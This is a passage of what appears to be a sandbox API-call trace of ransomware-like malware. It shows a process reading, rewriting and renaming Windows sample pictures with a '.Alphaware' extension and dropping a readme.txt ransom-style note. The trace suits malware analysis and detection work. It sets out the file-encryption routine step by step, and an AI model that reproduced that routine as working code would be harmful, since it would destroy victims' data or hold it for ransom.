ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jellyfish.jpg", cAlternateFileName="JELLYF~1.JPG")) returned 1 [0101.371] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Koala.jpg", cAlternateFileName="")) returned 1 [0101.371] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8907c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lighthouse.jpg", cAlternateFileName="LIGHTH~1.JPG")) returned 1 [0101.371] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Penguins.jpg", cAlternateFileName="")) returned 1 [0101.371] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tulips.jpg", cAlternateFileName="")) returned 1 [0101.372] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0101.372] FindClose (in: hFindFile=0xd8a4f0 | out: hFindFile=0xd8a4f0) returned 1 [0101.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0101.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0101.373] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", dwFileAttributes=0x80) returned 1 [0101.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0101.376] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2422458 | out: lpFileInformation=0x2422458*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22)) returned 1 [0101.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0101.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0101.377] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x260 [0101.377] GetFileType (hFile=0x260) returned 0x1 [0101.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0101.377] GetFileType (hFile=0x260) returned 0x1 [0101.377] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0xd6b22 [0101.380] ReadFile (in: hFile=0x260, lpBuffer=0x12b91648, nNumberOfBytesToRead=0xd6b22, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x12b91648*, lpNumberOfBytesRead=0x23ea98*=0xd6b22, lpOverlapped=0x0) returned 1 [0101.395] CloseHandle (hObject=0x260) returned 1 [0101.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0101.525] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x260 [0101.535] GetFileType (hFile=0x260) returned 0x1 [0101.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0101.535] GetFileType (hFile=0x260) returned 0x1 [0101.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0101.567] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8eb7b5c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11e508)) returned 1 [0101.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0101.567] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.Alphaware" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.alphaware")) returned 1 [0101.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0101.572] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\readme.txt" (normalized: "c:\\users\\public\\pictures\\sample pictures\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x260 [0101.572] GetFileType (hFile=0x260) returned 0x1 [0101.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0101.572] GetFileType (hFile=0x260) returned 0x1 [0101.574] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", dwFileAttributes=0x80) returned 1 [0101.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0101.574] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23c90d8 | out: lpFileInformation=0x23c90d8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875)) returned 1 [0101.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0101.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0101.575] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x260 [0101.575] GetFileType (hFile=0x260) returned 0x1 [0101.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0101.575] GetFileType (hFile=0x260) returned 0x1 [0101.575] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0xce875 [0101.576] ReadFile (in: hFile=0x260, lpBuffer=0x1287d5f8, nNumberOfBytesToRead=0xce875, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x1287d5f8*, lpNumberOfBytesRead=0x23ea98*=0xce875, lpOverlapped=0x0) returned 1 [0101.588] CloseHandle (hObject=0x260) returned 1 [0101.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0101.662] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x260 [0101.671] GetFileType (hFile=0x260) returned 0x1 [0101.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0101.672] GetFileType (hFile=0x260) returned 0x1 [0101.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0101.709] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8ecf8380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1136c8)) returned 1 [0101.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0101.709] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.Alphaware" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.alphaware")) returned 1 [0101.710] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini", dwFileAttributes=0x80) returned 1 [0101.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0101.712] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23c8b48 | out: lpFileInformation=0x23c8b48*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x460)) returned 1 [0101.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0101.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0101.713] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x260 [0101.713] GetFileType (hFile=0x260) returned 0x1 [0101.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0101.713] GetFileType (hFile=0x260) returned 0x1 [0101.713] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x460 [0101.713] ReadFile (in: hFile=0x260, lpBuffer=0x23c9660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23c9660*, lpNumberOfBytesRead=0x23ea98*=0x460, lpOverlapped=0x0) returned 1 [0101.715] CloseHandle (hObject=0x260) returned 1 [0101.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0101.737] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x260 [0101.738] GetFileType (hFile=0x260) returned 0x1 [0101.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0101.738] GetFileType (hFile=0x260) returned 0x1 [0101.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0101.740] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8ed44640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6b4)) returned 1 [0101.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0101.740] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.Alphaware" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.alphaware")) returned 1 [0101.741] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", dwFileAttributes=0x80) returned 1 [0101.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0101.741] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), fInfoLevelId=0x0, lpFileInformation=0x24a6d00 | out: lpFileInformation=0x24a6d00*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554)) returned 1 [0101.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0101.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0101.742] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x260 [0101.742] GetFileType (hFile=0x260) returned 0x1 [0101.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0101.742] GetFileType (hFile=0x260) returned 0x1 [0101.742] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x91554 [0101.753] ReadFile (in: hFile=0x260, lpBuffer=0x12640ba8, nNumberOfBytesToRead=0x91554, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x12640ba8*, lpNumberOfBytesRead=0x23ea98*=0x91554, lpOverlapped=0x0) returned 1 [0101.768] CloseHandle (hObject=0x260) returned 1 [0101.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0101.813] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x260 [0101.819] GetFileType (hFile=0x260) returned 0x1 [0101.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0101.819] GetFileType (hFile=0x260) returned 0x1 [0101.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0101.847] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8ee4efe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc1d48)) returned 1 [0101.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0101.848] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.Alphaware" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.alphaware")) returned 1 [0101.849] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", dwFileAttributes=0x80) returned 1 [0101.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0101.850] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23c67c0 | out: lpFileInformation=0x23c67c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616)) returned 1 [0101.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0101.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0101.851] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x260 [0101.851] GetFileType (hFile=0x260) returned 0x1 [0101.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0101.851] GetFileType (hFile=0x260) returned 0x1 [0101.851] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0xbd616 [0101.851] ReadFile (in: hFile=0x260, lpBuffer=0x12855a78, nNumberOfBytesToRead=0xbd616, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x12855a78*, lpNumberOfBytesRead=0x23ea98*=0xbd616, lpOverlapped=0x0) returned 1 [0101.862] CloseHandle (hObject=0x260) returned 1 [0101.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0101.910] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x260 [0101.918] GetFileType (hFile=0x260) returned 0x1 [0101.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0101.918] GetFileType (hFile=0x260) returned 0x1 [0101.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0101.944] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8ef33820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xfc8f4)) returned 1 [0101.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0101.944] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.Alphaware" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.alphaware")) returned 1 [0101.945] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", dwFileAttributes=0x80) returned 1 [0101.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0101.945] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23c7da0 | out: lpFileInformation=0x23c7da0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f)) returned 1 [0101.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0101.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0101.946] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x260 [0101.946] GetFileType (hFile=0x260) returned 0x1 [0101.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0101.946] GetFileType (hFile=0x260) returned 0x1 [0101.946] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0xbea1f [0101.947] ReadFile (in: hFile=0x260, lpBuffer=0x129130c8, nNumberOfBytesToRead=0xbea1f, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x129130c8*, lpNumberOfBytesRead=0x23ea98*=0xbea1f, lpOverlapped=0x0) returned 1 [0101.959] CloseHandle (hObject=0x260) returned 1 [0102.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0102.005] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x260 [0102.014] GetFileType (hFile=0x260) returned 0x1 [0102.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0102.014] GetFileType (hFile=0x260) returned 0x1 [0102.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0102.042] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8f018060, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xfe3a0)) returned 1 [0102.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0102.042] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.Alphaware" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.alphaware")) returned 1 [0102.043] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", dwFileAttributes=0x80) returned 1 [0102.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0102.059] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: 